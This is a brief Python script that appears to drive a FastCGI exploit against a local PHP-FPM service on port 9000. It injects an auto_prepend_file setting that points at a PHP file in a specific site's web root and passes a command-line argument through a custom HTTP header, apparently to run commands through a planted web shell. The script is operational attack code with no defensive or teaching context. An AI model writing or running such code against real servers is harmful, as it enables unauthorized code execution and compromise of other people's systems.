import sys
sys.path.insert(0,"/tmp")
from fcgi_exploit import fcgi_run
out=fcgi_run("127.0.0.1",9000,"/var/www/glarkru/data/www/glark.ru/index.php","auto_prepend_file=/var/www/glarkru/data/www/glark.ru/apo.php",b"",extra={"HTTP_X_C":sys.argv[1]})
print(out.decode("utf-8","replace"))
